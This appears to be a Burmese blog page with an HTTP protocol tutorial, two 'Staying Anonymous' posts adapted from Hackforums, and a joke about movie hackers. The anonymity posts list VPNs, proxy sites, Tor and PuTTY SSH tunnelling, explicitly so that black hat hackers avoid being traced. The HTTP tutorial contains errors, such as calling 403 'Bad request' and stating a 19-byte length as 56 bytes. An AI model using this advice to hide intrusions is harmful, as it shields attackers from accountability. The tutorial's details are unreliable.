ဘယ္လုိဆက္သြယ္ရမယ္။ ေဟာ server အေနနဲ. ဖုိင္ကုိရွာေပးနုိင္ရင္ client ကုိဘယ္လိုၿပန္အေၾကာင္းၿပန္ရမယ္ သူ.ရဲ. content ေတြကိုဘယ္လုိ ၿပန္ေပးရမယ္ စသည္ၿဖင့္ေပါ့ အဲဒါေတြကို သတ္မွတ္ထားတာေပါ့ဗ်ာ။
HTTP protocol က Network Layer ေတြရဲ.ဘယ္အေပၚမွာ အလုပ္လုပ္သလဲဆုိေတာ့ Transport Layer အေပၚမွာအလုပ္လုပ္ပါတယ္ ။ Transport Layer မွာ သူက TCP protocol ကုိသံုးပါတယ္. ဘာလုိ.လဲဆုိေတာ့ TCP ရဲ.သေဘာသဘာ၀က reliable data transfer ကိုေပးႏုိင္လုိ.ပါပဲ။ Reliable Data Transfer ဆိုတာကေတာ့ဗ်ာ တဖက္ကပုိ.လုိက္တဲ့ data packet ေတြကဟာမေပ်ာက္ပဲနဲ. တဖက္ကိုေရာက္ရိွႏုိင္တာကိုေၿပတာပါ။ အၿခားေသာ pouplar protocol ေတြၿဖစ္တဲ့ အီေမး ေတြအတြက္သံးုတဲ့ ွSMTP ဟာလည္း HTTP ကဲ့သုိ. TCP ကိုသံုးပါတယ္။ HTTP protocol ဟာ text based protocol ၿဖစ္ပါတယ္။ ဆုိခ်င္တာက မိတ္ေဆြအေနနဲ. HTTP protocol ကုိဖတ္ၿပီးေတာ့နားလည္ႏုိင္ပါတယ္ ဘာလုိ.လဲဆုိေတာ့ သူရဲ. Format က text ၿဖစ္တဲ့အတြက္ပါပဲ။ binary ဆုိရင္ေတာ့ ဖတ္လို.ခက္ပါလိမ့္မယ္။
Web Server ေတြနဲ. Web Client ေတြဟာ HTTP ကုိသံုးၿပီးဆက္သြယ္ပါတယ္။ ဆက္သြယ္မွု.ပံုစံကေတာ့ Request, Response model ၿဖစ္ပါတယ္။ Request, Response model ဆိုတာကေတာ့ဗ်ာ Web client က Web Server ဆီက တခုခုလိုခ်င္တယ္ဆုိပါေတာ့ အဲဒီအခ်ိန္မွာ Web Client ကေန Web Server ဆီကို HTTP request တခုလႊတ္လုိက္ပါတယ္။ အဲဒီ request ကုိ Web Server ကေနနားလည္ၿပီးေတာ့ web client ေတာင္းဆုိတာကို message တခုအေနနဲ.ၿပန္ေပးပါတယ္ response ေပါ့ဗ်ာ။ ဆုိခ်င္တာက HTTP Protocol အေပၚမွာဘာပဲလုပ္လုပ္ resquest လာမယ္ ၿပီးရင္ server ကေန response ၿပန္လာမယ္ေပါ့။ ဒီလိုနည္းနဲ.ပဲအလုပ္လုပ္ၾကပါတယ္။ ေနာက္ၿပီးေတာ့ resquest တခုနဲ.တခုကလဲ အဆက္အသြယ္ relation မရိွၾကပါဘူး။ အဲဒီမွာၾကံဳေတြ.ရတဲ့ၿပႆနာကေတာ့ session ၿပႆနာပါပဲ။ HTTP ဟာ request, response နဲ.သံုးတဲ့ stateless protocol ၿဖစ္တာေၾကာင့္ session ကုိ cookies ဒါမွမဟုတ္ တၿခားနည္းေတြနဲ.ေၿဖရွင္းရပါတယ္။ HTTP ဟာ statelss ၿဖစ္တယ္ဆုိတာ ေတာ့ ပထမလႊတ္လုိက္တဲ့ request နဲ. ဒုတိယလႊတ္လိုက္တဲ့ request ေတြဟာတူညီတဲ့ client ေတြၿဖစ္တယ္ဆုိတာ တနည္းအားၿဖင့္သူတုိ.ေတြဟာတဆက္တည္းၿဖစ္တယ္ဆုိတာ related ၿဖစ္တယ္ဆုိတာမသိတာပါပဲ။
ကဲ အခု HTTP Client ကေန Web Server ကိုဘယ္လုိ Request လႊတ္သလဲ Response ၿပန္သလဲဆုိတာကိုရွင္းပါ့မယ္။ Request, Response အားလံုးဟာ HTTP Message ေတြပါ။ သူတုိ.မွာတိက်တဲ့ format ပံုစံရိွပါတယ္ ဒါမွသာလွ်င္ various Web Server ေတြ Web Client ေတြဟာအတူတကြအလုပ္လုပ္ႏိုင္မွာပါ။ HTTP message ေတြမွာ request အတြက္ format တမ်ိဳး, response အတြက္ေတာ့သက္သက္တမ်ိဳးထားပါတယ္ ေအာက္ကပံုမွာ အဲဒါေတြကိုၿပထားပါတယ္။


အေပၚဆံုးပံုက က request message ကုိၿပထားတာပါ။
ဒုတိယပံုကေတာ့ reponse message ကုိၿပထားတပါ။ ဆုိပါေတာ့ဗ်ာ ကြ်န္ေတာ္တို.က server တခု ကေန /pet-products.txt ဖုိင္တဖုိင္ကုိလုိခ်င္တယ္ဆုိပါေတာ့ ဒါဆုိရင္ ပထမဆံုးပံု ပါအတုိင္းေတာင္းရမွာပါ။ အဲလုိေတာင္းမယ္ဆုိရင္ server အေနနဲ. ေတာင္းတဲ့ဖုိင္ကိုေပးႏုိင္တယ္ ဆုိရင္ ဒုတိယပံု အတုိင္း ၿပန္ေပးပါလိမ့္မယ္။ Request Message ကိုေသေသခ်ာခ်ာၾကည့္ရေအာင္ သူ.မွာ ႏွစ္ပုိင္းပါ ပါတယ္ ။ Strat Line ရယ္ request line ရယ္ေပါ့ဗ်ာ။ Start Line ဆုိတာ GET /pet-products. HTTP/1.1ေပါ့။ အဲ့မွာသံုးပုိင္းပါ ပါတယ္ GET ဆုိတာရယ္ /pet-products.txt ရယ္ HTTP/1.1 ရယ္ေပါ့။ GET ကေတာ့ HTTP method တခုပါ။ ဘယ္ေနရာမွာသံုးတာလဲဆုိေတာ့ resource တခုခုကို server ကေနေတာင္းခ်င္ရင္ သို.မဟုတ္ server side program တခုခုကို run ခ်င္ရင္သံုးပါတယ္။ ကြ်န္ေတာ္တုိ.ဟာ အခု /pet-products.txt ကိုေတာင္းတာၿဖစ္တဲ့အတြက္ GET ကုိသံုးတာပါ။ image တခုကိုလုိခ်င္ရင္လဲအဲလုိပဲေတာင္းရမွာပါ။ HTTP method ေနာက္မွလုိက္ရတာက ေတာ့လုိခ်င္တဲ့ resource ေပါ့ အခု ဒီမွာဆုိရင္ေတာ့ /pet-products.txt ေပါ့ဗ်ာ ။ ေနာက္ဆံုးအပုိင္းကေတာ့ HTTP protocol version ေပါ့။ ေလာေလာဆယ္ အသံုးအမ်ားဆံုး version ကေတာ့ HTTP/1.1 ပါပဲ။ HTTP/1.0 ကေတာ့ browser အေဟာင္းေတြမွာသံုးပါတယ္ ေတြ.ရခဲပါတယ္။ HTTP request နဲ.ေနာက္တပုိင္းကေတာ့ request line သို.မဟုတ္ body ေပါ့ဗ်ာ သူကေတာ့ request မွာလိုအပ္တဲ့တၿခား metadata ေတြကိုထည့္ေပးလုိက္ဖုိ.သံုးပါတယ္။ ဒီမွာဆုိရင္ Accept: ဆုိတဲ့ metadata ပါပါတယ္ သူကဘာေၿပာတာလဲဆုိရင္ client ကေနလက္ခံႏုိင္တဲ့ content type အမ်ိဳးအစားေတြပါ။ ဒီဥပမာ မွာဆုိရင္ အားလံုးလက္ခံတယ္ေပါ့ ။ေနာက္တခုက Host: ပါ အဲဒါကေတာ့ကြ်န္ေတာ္တုိ. Request ကိုလႊတ္တဲ့ computer ရဲ. IP သို.မဟုတ္ domain name ေပါ့ဗ်ာ။ အခုဥပမာေပးထားတဲ့ request ကုိ နားလည္ေအာင္ေၿပာရရင္ေတာ့ ေဟ့ web server ေရ ငါ့ကို /pet-products.txt ေပးစမ္းကြာ။ ငါက HTTP/1.1 ကုိသံုးထားတာကြ။ ငါကို.ရိွတာေပး လက္ခံႏုိင္တယ္ကြာ ေပါ့ဗ်ာ ။file ေတြပဲကြ။ ငါ့ရဲ. Host name က www.joes-hardware.com ကြလို.ေၿပာလိုက္တာပါ။ ဒီ request ကို TCP အေပၚကေန လုိခ်င္တဲ့ server ဆီကိုပုိ.လုိက္ရပါတယ္။ Web Serverေတြဟာမ်ားေသာအားၿဖင့္ TCP port 80 မွာ connection ေတြကိုလက္ခံၿပီးအလုပ္လုပ္ပါတယ္။ ဒီ request ကို web server ကနားလည္ၿပီးေတာ့ သူညြန္ၾကားတဲ့အတုိင္းလုပ္ပါလိမ့္မယ္။ အဆင္ေၿပရင္ response ၿပန္ေပးပါလိမ့္မယ္။ GET အၿပင္တၿခား HTTP method ေတြလဲရိွပါေသးတယ္။ popular ၿဖစ္တာကေတာ့ POST ေပါ့ ။သူက server မွာရိွတဲ့ program ကုိ run ဖုိ.အတြက္သံုးတာပါပဲ။ ကဲ GET နဲ.လဲလုပ္လုိ.ရသားနဲ. ဘာလုိ. POST ကုိသံုးတာလဲေပါ့။ GET နဲ.သာ server side program ကိုလွမ္း run မယ္ဆုိရင္ program အတြက္လုိအပ္တဲ့ parameter ေတြဟာ HTTP message ရဲ. Header သို.မဟုတ္ start line ကေနပို.တဲ့အတြက္ parameter ေတြကိုၿမင္ေနရပါတယ္။ POST ကုိသံုးတဲ့အခါ က်ေတာ့ parameter ေတြကိုmessage ရဲ. Body ကေနပို.တာၿဖစ္တဲ့အတြက္မၿမင္ရေတာ့ပါဘူး။ ေနာက္ သံုးလုိ.ရတဲ့ HTTP method ေတြကေတာ့
HEAD သူကေတာ့ header inforamation ေတာင္းရင္သံုးပါတယ္ ဥပမာ server အမ်ိဳးအစားနဲ. Versoin အဲဒါေတြလုိခ်င္ရင္သံုးပါတယ္။
PUT ကေတာ့ဗ်ာ တခုခုကို server မွာသြားတင္ခ်င္ရင္သံုးပါတယ္ server ေတာ္ေတာ္မ်ားမ်ားကအဲဒါကိုေပးမသံုးပါဘူးပိတ္ထားတတ္ပါတယ္
TRACE ကေတာ့ proxy server ေတြကေန web server ကုိဘယ္လိုသြားတယ္ဆုိတာသိခ်င္ရင္သံုးပါတယ္
OPTIONS ကေတာ့ server ကဘယ္ method ေတြကိုေပးသုံးလဲနဲ. ဘာေတြကို Handle လုပ္ႏုိင္လဲဆုိတာအတြက္သံုးပါတယ္
DELETE သူကေတာ့ server မွာရိွတဲ့ ဖုိင္ေတြကိုဖ်က္ဖုိ.သံုးပါတယ္ သူ.ကိုလဲ သာမာန္အားၿဖင့္ေပးမသံုးပါဘူး ပိတ္ထားေလ့ရိွပါတယ္။
အခု response message အေၾကာင္းရွင္းၾကရေအာင္။ ကြ်န္ေတာ္တုိ.ပို.လုိက္တဲ့ message ကုိ server ကနားလည္ၿပီးေတာ့ေတာင္းတာကိုေပးႏုိင္တယ္ဆုိပါေတာ့ဒါဆုိရင္ ဒုတိယပံု မွာပါတဲ့အတုိင္းၿပန္ေပးပါလိမ့္မယ္။ Response မွာသံုးပိုင္းပါပါတယ္ start line, header ရယ္ body ရယ္ေပါ့။ start line မွာေတာ့ HTTP/1.1 200 OK ဆုိတာေလးကိုေတြ.ပါလိမ့္မယ္ HTTP/1.1 ကေတာ့ version ပါ။ 200 ကေတာ့ server ဟာ client ရဲ. Request ကိုေအာင္ၿမင္တယ္ အုိေကတယ္ကိုအေၾကာင္းၿပန္တာပါ။ အဲဒါကို status code လို.ေခၚပါတယ္ ေအာင္ၿမင္ရင္ 200 ေပ့ါဗ်ာ သူ.ေနာက္က ok ကေတာ့ 200 ကုိ ကုိယ္စားၿပဴတဲ့စာသားပါပဲ။ status code ကိုၾကည့္ၿပီးေတာ့မွ browser ဟာသူဘာဆက္လုပ္ရမယ္ဆိုတာသိပါလိမ့္မယ္။ 200 အၿပင္တၿခားေသာ status code ေတြလဲရိွပါေသးတယ္။ အဲဒါေတြကထဲမွာအသံုးမ်ားတာ 403 Bad request, နဲ. 500 Internal Server Error တုိ.ပါပဲ။ start line ၿပီးသြားရင္ response header လာပါၿပီ။သူ.မွာလဲ response နဲ.ပတ္သတ္ၿပီးေတာ့ metadata ေတြကိုထည့္ဖုိ.သံုးတာပါပဲ။ ဥပမာ sound ဖုိင္တဖုိင္ဆုိရင္ ဘယ္လုိ အမ်ိဳးအစားလဲ အဲလိုအမ်ိဳးအစားသိေတာ့မွ ဘယ္ player နဲ. Run ရမယ္ဆုိတာ browser ကသိမွာပါ။ဒီ ဥပမာမွာၿပန္လာတာကေတာ့ Content-Type: text/plain ၿဖစ္ပါတယ္ ဒါဆုိရင္ browser အေနနဲ.အခုၿပန္လာတာဟာ text file တခုၿဖစ္တယ္ဆုိတာသိပါၿပီ အဲဒီေတာ့ ဒီ text file ကုိ display လုပ္ပါလိမ့္မယ္ အကယ္လုိ.သာ သူဟာ text/html ၿဖစ္ေနတယ္ဆုိရင္ အဲဒီ content ကုိ html အေနနဲ. Render (ပံုေဖာ္)ဖုိ.လုပ္မွာပါ။ Content-Type ေနာက္မွာပါလာတာကေတာ့ Content-Length: 19 ၿဖစ္ပါတယ္ သူကဘာကိုရည္ညြန္းတာလဲဆုိရင္ ၿပန္လာတဲ့ respone ရဲ. Message body ဟာ 56 bytes ရိွတယ္လုိ.ေၿပာတာပါ။အဲဒါကုိသိတဲ့အတြက္သာ web browser ဟာ messge body ထဲကေန ဘယ္ ႏွစ္byte ဖတ္ရမလဲဆုိတာသိမွာပါ။ ေၿပာဖို.က်န္ခဲ့တာကေတာ့ Start Line, message header, body ေတြကို \r\n newline နဲ.ၿခားထားတယ္ဆုိတာပါပဲ။ ေနာက္ဆံုးအပုိင္းကေတာ့ content ပါပဲ။ ကြ်န္ေတာ္တုိ.က text file တခုကိုေတာင္းတဲ့အတြက္ text ေတြပါလာတာပါ။ တကယ္လို. Html ဖုိင္တခုကုိသာေတာင္းခဲ့မယ္ဆုိရင္ html content ေတြရမွာပါ။ၿပန္လာတဲ့ response ကုိၾကည့္ၿပီးေတာ့ browser အေနနဲ. Content ကို render လုပ္ႏုိင္ပါၿပီ။ ကဲ အဆင္ေၿပမယ္လုိ.ေတာ့ေမွ်ာ္လင့္ပါတယ္ဗ်ာ။ HTTP protocol ကုိတကယ္စမ္းခ်င္ရင္ေတာ့ netcat, ဒါမွမဟုတ္ telnet နဲ.စမ္းလုိ.ရပါတယ္။ 

source http://mmcyberdevils.com/index.php?/topic/69-introduction-to-http-protocol/
Read More ->>

Staying Anonymous (part two)



ဒီေန႕ေတာ့ ေနာက္ထပ္တစ္ပိုင္းအေနနဲ႔ ကၽြန္ေတာ္ သိသေလာက္ဆက္လက္တင္ျပသြားမွာပါ..ဒီတစ္ခါလဲအမႊားပါသြားရင္ ေခြးလြတ္ေပးေစခ်င္ပါတယ္...။
အရင္တုန္းက offline protection ဆိုေတာ့ အခု ေနာက္တစ္ပိုင္းအေနနဲ႔ online protection ေပါ့...။

Online protection

Types of online protection

  1. VPN(s)
  2. Proxies
  3. Tor
  4. SSH Tunneling
တို႕ျဖစ္ၾကပါတယ္......။

VPN (Virtual Private Network)

တစ္မ်ိဳးအားျဖင့္ ေက်ာ္မယ္ခြမယ္ IP ေျပာင္းမယ္ဆိုရင္သံုးတယ္ဗ်...။ဘယ္လိုေျပာရမလဲဆိုေတာ့ သူဟာ
network တစ္မ်ိဳးျဖစ္ျပီးေတာ့ အဓိကအားျဖင့္ public telecommunication infrastructure ျဖစ္ပါတယ္...။
ေျပာမယ္ဆိုရင္ အမ်ားလည္းသံုးရတဲ့ network တစ္မ်ိဳးျဖစ္ျပီးေတာ့ ကၽြန္ေတာ္တို႕ websites ေတြ၀င္ေရာက္ တဲ့အခါ လံုျခံဳမႈကိုေပးျပီးေတာ့ IP ေတြကိုလဲ ေဖ်ာက္ဖ်က္ ေပးမွာျဖစ္ပါတယ္....ဥပမာအားျဖင့္ Myanmar နိုင္ ငံက IP ကို US က IP အျဖစ္ေျပာင္းလဲႏိုင္မွာပါ....။ဘေလာ့ဂါေတြအတြက္လဲ အခက္အခဲမရိွ ေက်ာ္ခြ သံုးႏိုင္ ပါတယ္...ဥပမာ skynet လိုင္သံုးတဲ့သူမ်ိဳးေတြအတြက္ တကယ္အသံုးတဲ့ပါတယ္...ဘေလာ့ဂါတိုင္းေဆာင္ ထားသင့္ပါတယ္....။ လူအမ်ားနဲ႕ သံုးလို႕ရတာေၾကာင့္ အေကာင့္တစ္ခုကို လူအမ်ားၾကီး သံုးဆြဲရင္ Bandwith မႏိုင္ရင္အသံုးျပဳရတာေလးကန္ႏိုင္ပါတယ္.....။

Free VPNs

Cyberghost
HotSpot Shield
Pro XPN
Open VPN

Paid VPNs

nVPN
SwissVPN 

HTTP Proxies and SOCKS5

ကၽြန္ေတာ္တို႕ အေနနဲ႕ ပရုပ္ဆီေျပာင္းျပီး လိုင္းေပၚမွာေနရာေျပာင္းႏိုင္ပါေသးတယ္...ေျမာက္မ်ားစြာေသာ
ပရုပ္ဆီ List ေတြကို ေအာက္ပါေနရာမ်ားကေန အလကာရယူလိုက္ပါ....။

Alive Proxy
Hide My Ass
Proxy list

မွတ္ခ်က္ Hide My Ass proxy ေတြကို Hacking လုပ္တဲ့ေနရာမွာမသံုးရ...။

Hackforums မွ proxy lists မ်ားကို ဒီေန ရာမွာရႏိုင္ေသးပါတယ္....။

Premium and Private SOCKS5 ေတြအတြက္ကေတာ့ Google search မွာရွာေဖြေလ့လာႏိုင္ပါေသး
တယ္...။

Some Proxy sites

ပရုပ္ဆီဆိုက္ေတြအမ်ားၾကီးရိွပါတယ္...လံုးျခံဳစိတ္ခ်ရေသာ ဆိုက္တစ္ခ်ိဳ႕ကိုတင္ျပေပးထားပါတယ္...

http://www.ninjacloak.com
http://www.hidemyass.com
http://go-between.me
http://ir2.me
http://rapidsurf.info
http://go-between.me
http://ir2.me
http://rapidsurf.info
http://yourownproxy.info
http://proxy.co.cc
http://iknownothing.org
http://accessyouth.info
http://buwk.com
http://UnblockFree.net
http://hillofbeans.biz
http://aptunnel.com
http://goaheadmakemyday.org
http://lameproxy.info
http://centerfoldproxy.info
http://proxylist.co
http://sneaky9.com
http://freesurfproxy.com
http://goflyakite.org
http://fastieproxy.com
http://ihaveacunningplan.info
http://schoolfreezone.com
http://proxify.net
http://passmethru.com
http://proxy2use.com
http://0001.cz.cc

ေက်ာ္လို႕ခြလို႕လဲ အဆင္ေျပႏိုင္ပါတယ္....။

Tor

Tor ဆိုတာအလာရတဲ့ free software ျဖစ္ပါတယ္....သင့္ secure browsing တြက္လိုအပ္တဲ့ေဆာ့၀ဲပါ...
Hide anonymous လုပ္ႏိုင္တဲ့အျပင္ မိမိ IP address ကိုပါေနရာေရြ႕ ႏိုင္ပါေသးတယ္..။

အျပည့္အစံုကို ဒီမွာဆက္လက္ဖတ္ရႈႏိုင္ပါတယ္....။
https://www.torproject.org/about/overview.html.en

Download Here
Download Here


SSH Tunneling

SSH Tunneling ကိုအသံုးျပဳဖို႕ ေအာက္ပါ ေဆာ့၀ဲေတြ လိုအပ္ပါတယ္.....။

  1. PuTTY
  2. Firefox
Download PuTTY Here




ကဲ ေအာက္ပါအတိုင္းလိုက္ျပီးလုပ္လိုက္ၾကရေအာင္

1.PuTTY ကိုဖြင့္လိုက္ပါ.
2.ျပီးရင္ Text Box မွာ သင့္ IP address ကိုထည့္ရပါမည္...။


3.ျပီးရင္ ဘယ္ဘက္ အျခမ္းက အကြက္ထဲက List ေတြထဲမွာ ေအာက္ဆံုးနာေလာက္မွာ SSH ေဘးက '+'
ေလးကိုကလစ္ျပီးဖြင့္ခ်လိုက္ပါ...။
4. Tunnels ကိုကလစ္လိုက္ပါ...
5. သင္ Port ကိုထည့္ ရမွာျဖစ္ျပီး  Dynamic ကိုကလစ္လိုက္ပါ။
6. ျပီးရင္ ADD နဲ႕ Open ကိုကလစ္လိုက္ပါ...။ connection ရေအာင္ဆက္သြယ္ပါလိမ့္မယ္..
7. ရျပီဆိုရင္သင့္ Browser ထဲကိုသြားျပီး IP ကို 127.0.0.1 လို႕ထည့္ျပီး port ရိုက္သြင္းပါ..။
8. ဒီအဆင့္ေတြျပီးရင္ သင့္ Browser ကိုအသံုး ျပဳႏိုင္ပါျပီ..။

ကၽြန္ေတာ္ကဘာသာျပန္ျပီးေရးတာဆိုေတာ့ အမွားေတြ ပါႏိုင္ပါတယ္ ဒါ့ေၾကာင့္ လက္သယ္ ခ်ည္းပဲ အား ကိုးမေနပါနဲ႕ မႈရင္းဆိုက္မွာလဲ တစ္ခ်က္ေလာက္၀င္ၾကည့္ႏိုင္ပါတယ္...။
 
http://www.hackforums.net/showthread.php?tid=2237268

Ebook For Staying Anonymous

ေနာက္ျပီး Staying Anonymous အတြက္ စာအုပ္ English version တစ္အုပ္ရိွပဲေသးတယ္  တစ္ခါတည္း တြဲတင္ေပးလိုက္တာ ေအာက္ပါေနရာက ေဒါင္းႏိုင္ပါတယ္....


Download
Download

Auto Hide IP

ေနာက္ျပီး Auto Hide IP ဆိုတာေလးပါ တစ္ခါတည္းလင့္ခ်ိတ္ေပးလိုက္တယ္....သံုးလို႕တကယ္ေကာင္း
တယ္.....။

Download

တစ္ခုေျပာခ်င္တာက ဒီေလာက္ပုန္းေနလဲရွာႏိုင္တဲ့ဟာေတြရိွပါေသးတယ္...။ကၽြန္ေတာ္က အစပ်ိဳးေပးလိုက္တာပါ ေနာက္ထပ္ ဆက္လက္ေလ့လာၾကပါလို႕ေျပာခ်င္ပါတယ္...။တကယ္တမ္းကၽြန္
ေတာ္လဲေလ့လာဆဲသူတစ္ေယာက္ပါ ဘာမွကိုမတတ္ေသးပါဘူး ...။အမွာပါရင္ခုထဲက ေတာင္းပန္ရင္ နဲ႕
အဆံုးသတ္ပါရေစဗ်ာ...။

PS: လင့္မ်ားမေကာင္းရင္ Cbox ထဲမွာ ေရးသြားႏိုင္ပါတယ္....

http://shwekoyantaw.blogspot.com
shwekoyantaw










Read More ->>

Monday, June 4, 2012

Staying Anonymous (part one)



မွန္ရာကို၀င္ခံရရင္ဒီပို႕ ကို ကၽြန္ေတာ္သိသေလာက္တင္ျပေရးသာတာျဖစ္ပါတယ္...။
ဂယ္ေျပာတာ Black Hat တစ္ေယာက္အတြက္ လူမသိသူမသိေနထိုင္ဖို႕က အေရးၾကီးတယ္ေလ...။ကၽြန္ေတာ္ စေကးကေတာ့( ၀ )level ဆိုေတာ့သိပ္ပုန္းစရာလိုဘူးေပါ့ဗ်ာ....:D...
ေနာက္တာပါခုတင္ျပမွက HF ကပို႕စ္ေလးတစ္ပုဒ္ကို မသိတသိ ျပန္ေရးေပးလိုက္တာ..

PS; ကၽြန္ေတာ္က ENG ေစာက္ရမ္း ကၽြမ္းက်င္ေတာ့ အမွာပါရင္ ခုထဲကေတာင္းပန္ပါ၏....

တကယ္ေတာ့ Hacker တစ္ေယာက္ဟာ online ေပၚမွာေကာ္ offline မွာေကာ မိမိ ေနရာမွန္ကို မသိေစရန္အရမ္း အေရးၾကီးပါတယ္....တေလာကေတာင္ BHG ကတစ္ေယာက္ေတာင္ တယ္လီပို႕စ္ မွာစစ္ ေဆးခံရလို႕ တဲ့တကယ့္လက္ေတြ႕
ကၽြန္ေတာ္တင္ျပမွာေကာင္းမေကာင္းေတာ့မသိပါဘူး ဒါေပမယ္ကတိုင္းအတာတစ္ခုေလာက္ေရာက္ရင္
ေတာ္ပါျပီ..........။

ဒီေနရာမွာ အမ်ိဳးအးစာႏွစ္ခုခဲြထားပါမယ္....

online protection
offline protection

offline protection

ဒီေနရာမွာေျပာ ခ်င္တာက ဒီအပိုင္းမွာ virus,Trojans ,root kit စတဲ့ရန္ေတြက ကာကြယ္တာျဖစ္ပါတယ္..
ဘယ္ေလာက္ပဲေတာ္ေတာ္ ကိုယ္သတိလြတ္သြားတာ ရင္ Keylogger ၇န္ေတြက တကယ္ဆိုး၀ါးေစပါတယ္.

Protect from malware

Malwarebytes' Anti-Malware (MBAM) တဲ့ေဆာ့၀ဲက သင့္ကြန္ျပဴတာထဲ ေရာက္လာတဲ့ Malware ေတြကို စစ္ေဆး ဖယ္ရွာေပးမွာပါ...။

More and Download

Encrypt your Keystrokes using KeyScrambler

Keylogger ရန္ကကာကြယ္ရေအာင္ anti keylogger program ျဖစ္တဲ့ KeyScrambler ကိုအသံုးျပဳႏိုင္ပါတယ္.....။

More and Download

Get a Firewall

အထူးကိုေျပာစရာမလိုတာပါ...ဘယ္လိုျဖစ္ျဖစ္ internet သံုးရင္ firewall ေကာင္းေကာင္းမြန္မြန္ ကို သံုးကို သံုးသင့္တယ္........။မူရင္းေရးသာသူကေတာ့ COMODO Firewall ကို ရည္ညြန္းပါတယ္...personal firewall software on Internet မွာ ဆုရထားတဲ့ဟာပါ...။

Download Here

Protect your files and OS using True Crypt.

True Crypt ဆိုတာ အလကားရတဲ့ open source ေဆာ့၀ဲပါ...Windows 7/Vista/XP, Mac OS X, and Linux. အတြက္ သံုးႏိုင္ပါတယ္...




Download Here

Deepfreeze your PC to prevent common attacks

ဒါကေတာ့လူတိုင္းသိပါတယ္ Deepfreeze ကိုစက္တိုင္းမွာသံုသင့္တယ္လို႕ထင္ပါတယ္...မူရင္ေရးသာသူက ေတာ့ေတာ္ေတာ္ေလးကိုရည္ညြန္းထားတာကို
ေတြ႕ရပါတယ္....

Download Here

Use CCleaner, the multi-purpose tool

CCleaner ဆိုတာခုဆိုင္တိုင္းလိုလို အိမ္တိုင္းလိုလို တင္ထားေနၾကပါျပီ။ဒါ့ေၾကာင္ေသျခာရွင္းျပမေနေတာ့
ပါဘူး...deleting files, clearing temp files, cache, စေသာလုပ္ေဆာင္ခ်က္မ်ားအျပင္ အမ်ားၾကီးပါပါ
ေသးတယ္....။

Download Here


Clear the evil cookies

cookies ဆိုတာစားေကာင္းရံဳတင္မဟုတ္ပါဘူး သင့္ကို္ပိုင္ Pass ေတြ သင္internet သံုးတုန္းက cookies
ေတြက်န္ခဲ့မယ္ဆိုရင္ ပါမယ့္သာျပင္....။ဒီႏိုင္ငံမွာေတာ့ သိပ္မလုပ္ၾကဘူးရယ္....မထင္ပါနဲ႕ မက်န္ခဲ့တာ
အေကာင္ဆံုးပါပဲ....။အလြယ္ကူဆံုးနဲ႕ က်က်နနရွင္းခ်င္တယ္ ဆိုရင္ အဲဒီ့ cookies ေတြကို ၀ါးစားလိုက္
အဲဟုတ္ပါဘူး Flash Cookie Remover ကိုသံုး...လိုက္ၾက...။

Download Here

Part one ကေတာ့ဒီေလာက္ပါပဲ....ေနာက္ထပ္ online protection လာဦးမယ္....။နည္းပညာဆို တာေလ့
လာဖို႕ မကုန္ပါဘူး....ကၽြန္ေတာ္သိသေလာက္တင္ျပတာဆိုေတာ့ လိုအပ္ခ်က္ေတြရိွ ေနဦးမွာပါ....သိတဲ့သူ
တိုင္ရီႏိုင္သလို...မသိေသးသူေတြအတြက္ အနည္းငယ္မွ် အသိပညာရႏိုင္ေလာက္ပါတယ္ဗ်ာ...။

ref:http://hackforums.net/showthread.php?tid=2237268
Read More ->>

Hackers from the M0VI3




ကၽြန္ေတာ္သေဘာက်လိုတင္ေပးလိုက္တာပါ...ေတာ္ေတာ္ေလးကိုသေဘာက်တာ ဘာလို႕လဲ သိခ်င္ရင္
ဆက္လက္ဖတ္ၾကည့္ၾကေပါ့ဗ်ာ....
ဘယ္သူ႕ကိုမွတုိက္ခိုက္ခ်င္လို႕ရယ္ေတာ့မဟုတ္ဘူး ဒီတိုင္း အပင္ပန္းေျပ ေပ်ာ္ေစ ျပတ္ေစ ကလက္ေစပဲ :-D ( ေတာ္ၾကာ ကၽြန္ေတာ္တစ္ခုခုေရးတိုင္း သူတို႕ကို $ ေဖာင္းထုပါတယ္ လုပ္တဲ့လူေတြရွိေနလို႕ :-D )
ဟုတ္ပါတယ္ ကၽြန္ေတာ္တုိ႕ ဇာတ္လမ္းေတြထဲမွာ Hacker ေတြျမင္ဖူးၾကမယ္ထင္ပါတယ္ လႊတ္ေကာင္း ကြန္ပ်ဳတာအမ်ားၾကီး ေစာ္အလန္းေလးနဲ႕  :-D အဲ့ဒီ့လို Hacker ေတြအေၾကာင္းေပါ့ဗ်ာ
၁.Monitor မ်ား
ဘယ္ Hacker မဆုိပါ ဇာတ္လမ္းေတြထဲမွာဆို မ်ားလိုက္တဲ့ Monitor ေတြ မ်က္စိေျခာက္လံုးပါေတာင္ မေလာက္ဘူး ၾကည့္ရတာေတာ့ေရလည္မိတယ္ ေမာ္နီတာေတြအမ်ားၾကီးနဲ႕ မင္းသား Hacker က မိန္႕မိန္႕ၾကီး ထိုင္လို႕ လန္ကၽြတ္ေနတာပဲ :-D
၂.Typing Skill
အုိ Command ေပးတာၾကည့္ဦးမလား ျမန္လိုက္တဲ့ျဖစ္ျခင္း ခလုတ္နဲ႕လက္ေတာင္ ထိရဲ႕လားမသိဘူး စႏၵယား တီးသလိုပဲ Lol :-P
၃.Never Use Mouse
ရုပ္ရွင္ေတြထဲက Hacker ေတြဟာ ဘယ္ေတာ့မွာ Mouse မသံုးပါဘူး တစ္ေဖ်ာက္ေဖ်ာက္ Key Board ရိုက္တယ္ ျပီးတာနဲ႕ ျဗဳန္းဆို Enter ၾကီး ေခါက္လုိက္ေရာ ေဟာ ျပီးရင္ ထပ္ရိုက္ျပန္ျပီ ျပီးရင္ ေခါက္ျပန္ျပီ :-D
၄.Watch the Bar
Hack ေနခ်ိန္မွာ Process Bar ေလး တျဖည္းျဖည္းခ်င္းတက္လာပါ ျပီးရင္ Enter ၾကးီး ၀ုန္းခနဲေခါက္ျပီး Hack လို႕ျပီးသြားေလသည္ :-D
၅.Password Guessing
Target ရဲ႕ Password ကို Hack ခ်င္ရင္ ဘာမွမသံုးပါနဲ႕ Guessing တစ္ခုနဲ႕တင္ အဆင္ေျပသြားပါျပီ Guessing ဆိုတာေတာင္ လြယ္လြယ္ကူကူပဲသံုးေခါက္ေလာက္ဆို ၀င္ပါ့ေစ :-D
၆.Hack with HTML
Hack ေနခ်ိန္မွာ HTML Code ေတြ Monitor မွာ တသီၾကီးတက္ေနပါေစ :-D Html နဲ႕ ရုပ္ရွင္ထဲမွာ Hack လို႕ရပါတယ္
